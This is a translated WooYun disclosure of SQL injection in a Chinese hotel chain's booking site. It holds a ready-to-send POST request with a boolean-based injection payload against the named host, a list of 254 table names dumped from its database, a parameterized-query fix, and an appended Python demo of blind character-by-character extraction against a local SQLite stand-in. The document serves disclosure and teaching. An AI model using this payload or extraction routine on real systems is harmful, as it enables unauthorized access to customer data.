
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0162001

Title: 雅客e家快捷酒店 (Yake e-Home Express Hotel) SQL injection (leaks a large amount of data!)

Affected vendor: 雅客e家快捷酒店

Author: 不败顽童

Submitted: 2015-12-17 12:52

Fix time: 2016-01-28 17:10

Disclosed: 2016-01-28 17:10

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-12-17: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2016-01-28: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

I want to say: with these 254 tables, is there anything I can't see?
Can people still check into a room with peace of mind from now on?

Details:

POST /crs/internalMsgInfoList.html HTTP/1.1
Content-Length: 151
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.ykinns.com:80/
Cookie: JSESSIONID=0F35D01CD527AD63EF559BD18BEA2F68; JSESSIONID=8E9589F5903E9046C30649F7273752D5
Host: www.ykinns.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
acceptTime=4111111111111111&button=%e6%90%9c%e7%b4%a2&content=-1'%20OR%203*2*1%3d6%20AND%20000208%3d000208%20--%20&msgtype=0&page=1&sendTime=1&status=0

Proof of vulnerability:

[screenshot: 2015-12-16_19-08-36.jpg]

[screenshot: 2015-12-16_19-09-18.jpg]

254 tables, heh...
Database: chain702
[254 tables]
+-------------------------------+
| order |
| user |
| accountingtitle |
| acctrecoverpoint |
| adinfo |
| adtype |
| agreementcompany |
| agreementcompany_view |
| agreementtype |
| assuretype |
| attrs |
| attrvalues |
| audit |
| auth_i |
| autoupuserlevel |
| backroomrecover |
| bigmenu |
| bills |
| brands |
| businessstatistic4day |
| businessstatisticsdailyreport |
| centerpower |
| changecard |
| checkroom |
| city |
| cityview |
| clearhouserecord |
| clearhouseset |
| clearroomrecords |
| clientmac |
| comefrom |
| comments |
| companyvoucher |
| compensationrecord |
| complaintsearch_view |
| complaintstatus |
| conferenceorder |
| conferenceroom |
| consumergoods |
| consumptions |
| consumptiontype |
| controltype |
| crfolder |
| croomstats |
| crpara |
| crreport |
| crreport_shoucang |
| currencytype |
| custacct |
| custacct_11 |
| custacct_20141105_708616 |
| custacct_invoice |
| custacctcheckout |
| customdept |
| datadictionary |
| dayrentforfree |
| dayreport |
| dayreportitem |
| dayreportmonth |
| dayreportyear |
| dayturnover |
| department |
| dept |
| dgoods |
| dgoods_20150104 |
| downtown |
| dynamichouse |
| dynamichouseprice |
| emp |
| equipment |
| equrepair |
| exchange |
| exchange_view |
| floor |
| gatecard |
| gateway |
| generalstatistic |
| generalstatistic_invoice |
| giftPresent |
| goods |
| gorder |
| gorderdetail |
| grouppaytemplate |
| gtype |
| guest_view |
| horder |
| horder_11 |
| horder_view |
| hotel |
| hotelcalendar |
| hotelzone |
| hourhouse |
| house |
| house_view |
| houseprice |
| housestatus |
| housetype |
| housetypestatistic |
| idcard |
| iftype |
| incre_table |
| industry |
| internalcommunicationinfo |
| invgoods |
| invoiceappend |
| keeper_view |
| leaveinfo |
| livegroup |
| livingcusthis |
| livingcusthis_invoice |
| log |
| loginfo |
| mail |
| mainmenu |
| manager |
| manager_view |
| managerdiscount |
| market |
| mealticket |
| membercoupon |
| memberzone |
| memberzone_wx |
| menu |
| message |
| microblogbind |
| mob_access |
| mob_problem |
| mobilepower |
| monthstatistic |
| msgtype |
| nations |
| news |
| news_view |
| newsimplelog |
| newtype |
| notice_view |
| oauthinfo |
| oldreport |
| onlineservice |
| operatingincome |
| operatordictionary |
| operatoryjtj |
| order_11 |
| pagepower |
| paratype |
| partsettlerecover |
| payment |
| permission |
| permissionlog |
| personcome |
| planreason |
| portalpower |
| power |
| powermacbind |
| preauth |
| priceagreement |
| priceplan |
| project |
| project20130403 |
| projectprice |
| projecttype |
| projecttypes |
| publicaccount |
| ratecode |
| ratecodedetail |
| ratecodedetails |
| ratetype |
| reason |
| reason_view |
| reasondictionary |
| rechargevalue |
| rechargevaluediscount |
| rent |
| rentleave |
| rentleave_view |
| rentleavestatus |
| repairlevel |
| reportmapping |
| resetuserpwdback |
| room |
| roomall |
| roomcount |
| roomdaydata |
| roomrate |
| roomstatistics |
| roomstatus_view |
| roomtype |
| rpt_memberconsumer |
| saleperson |
| salseanalysis |
| score |
| scoreback |
| scoreruleexp |
| scoretohouse |
| sendsmsginfo |
| sequence |
| settleacct |
| settleacct_11 |
| settleconference |
| sgoods |
| shift |
| shifthandover |
| simplegroup |
| simplegroup_11 |
| simplegroup_view |
| smsgdetails |
| smsginfo |
| smsgmoinfo |
| smsgtype |
| smsgtypedetails |
| specialevent |
| specialhouseprice |
| statisticitem |
| statisticitem_invoice |
| stopandrepairreason |
| stoproomreport_view |
| store |
| supplier |
| supplier_wms |
| sys |
| sys_wx |
| sysctrl |
| systemlog |
| systemlog_view |
| task |
| telebill |
| tempinfo |
| thirdportal |
| ticketset |
| tickettransfer |
| tickettype |
| tmember |
| totalaccount |
| transfer |
| user_view |
| userback |
| userblackinfo |
| usercardprice |
| userhotelid |
| userlevel |
| userlevel_bck |
| userpreference |
| userrelorder |
| userrelorder_11 |
| userrelorder_user_view |
| userscore |
| userscorerule |
| userstatistic |
| vacctdetail |
| virtualacct |
| wakeuproom |
| workacct |
| workrecord |
| wrs_style |
+-------------------------------+

Suggested fix:

Filter special characters. Filtering alone is only a stopgap: the `content` value (and the other search fields in the request) should be bound as parameters of a prepared statement so that user input is never concatenated into the SQL text, which is what lets the quote in the payload above terminate the string literal.
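The boolean-based probe carried in the request above, and the parameterized form that neutralises it, as an added example (not code from the report or from the ykinns.com application, whose server-side SQL is not shown on the page). It runs against an in-memory SQLite database: the table name `internalcommunicationinfo` is taken from the dumped table list, but its columns, the sample rows and the `search_vulnerable` / `search_safe` / `ask` / `blind_extract` helpers are constructed here for illustration. `unicode()`, `substr()` and `sqlite_master` are the SQLite spellings of what would be `ascii()`, `substring()` and `information_schema.tables` on MySQL. The example goes one step past the page: it shows how the same yes/no oracle that the page's payload establishes is walked character by character to recover a table name, which is how a tool such as sqlmap arrives at a list like the one above.

```python
"""Boolean-based blind SQL injection, reproduced against a constructed stand-in.

Added example, not code from the original report or from the affected site.
Assumptions: a table `internalcommunicationinfo` (name from the dumped list,
columns invented) queried by string concatenation in the vulnerable version
and by bind parameters in the fixed one.
"""
import sqlite3
from urllib.parse import unquote

# Constructed sample rows: id, content, sendtime, msgtype, status
SAMPLE_ROWS = [
    (1, "Room 302 checkout", "2015-12-16", 0, 0),
    (2, "VIP arrival 20:00", "2015-12-16", 0, 1),
    (3, "Lost key card", "2015-12-15", 1, 0),
]

# The `content=` value from the report's request, URL-encoded as captured.
PAGE_PAYLOAD_ENCODED = "-1'%20OR%203*2*1%3d6%20AND%20000208%3d000208%20--%20"


def decode_page_payload():
    """Undo the URL encoding of the captured payload (it ends in a space)."""
    return unquote(PAGE_PAYLOAD_ENCODED)


def make_db():
    """In-memory SQLite database standing in for the hotel CRS schema."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE internalcommunicationinfo("
        "id INTEGER PRIMARY KEY, content TEXT, sendtime TEXT, "
        "msgtype INTEGER, status INTEGER)"
    )
    con.executemany(
        "INSERT INTO internalcommunicationinfo VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS
    )
    return con


def search_vulnerable(con, content):
    """The defect: input is spliced into the SQL text, so a quote ends the literal."""
    sql = "SELECT id FROM internalcommunicationinfo WHERE content = '" + content + "'"
    return [row[0] for row in con.execute(sql)]


def search_safe(con, content):
    """The fix: the value is bound as a parameter and can never become SQL syntax."""
    sql = "SELECT id FROM internalcommunicationinfo WHERE content = ?"
    return [row[0] for row in con.execute(sql, (content,))]


def ask(con, search, condition):
    """One yes/no question through the injection point: a non-empty result means TRUE."""
    return len(search(con, f"-1' OR {condition} -- ")) > 0


def is_boolean_blind_injectable(con, search):
    """sqlmap-style detection: a true and a false tautology must differ in result."""
    true_probe = ask(con, search, "3*2*1=6 AND 000208=000208")   # the page's payload
    false_probe = ask(con, search, "3*2*1=7 AND 000208=000208")  # same shape, false
    return true_probe and not false_probe


# Scalar expression whose value we want to read out through the oracle.
TABLE_NAME_EXPR = "SELECT name FROM sqlite_master WHERE type='table' LIMIT 1"


def blind_extract(con, search, expr, max_len=64):
    """Recover the string value of `expr` one character at a time.

    Each position is found by binary search over printable ASCII, so a
    25-character name costs about 25 * 7 requests.  An empty string means the
    oracle never answered TRUE, i.e. the query is not injectable this way.
    """
    recovered = []
    for pos in range(1, max_len + 1):
        if not ask(con, search, f"length(({expr})) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(con, search, f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered.append(chr(lo))
    return "".join(recovered)


if __name__ == "__main__":
    db = make_db()
    print("decoded payload:", repr(decode_page_payload()))
    print("vulnerable version injectable:", is_boolean_blind_injectable(db, search_vulnerable))
    print("fixed version injectable:", is_boolean_blind_injectable(db, search_safe))
    print("first table name via blind extraction:",
          blind_extract(db, search_vulnerable, TABLE_NAME_EXPR))
```

Run it as-is to see the vulnerable search return every row for the page's payload and nothing for its false twin, while the parameterized search returns nothing for either; the blind walk then spells out the table name through the vulnerable path only. On the real target the probe is the `content` field of the POST and the oracle is whatever the page body or status differs on between the true and false variants, which is exactly the difference the two screenshots in the proof section show.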

Copyright notice: when reposting, please credit the source: 不败顽童@乌云


Vendor response

Vendor response:

The vendor could not be contacted, or the vendor actively declined to respond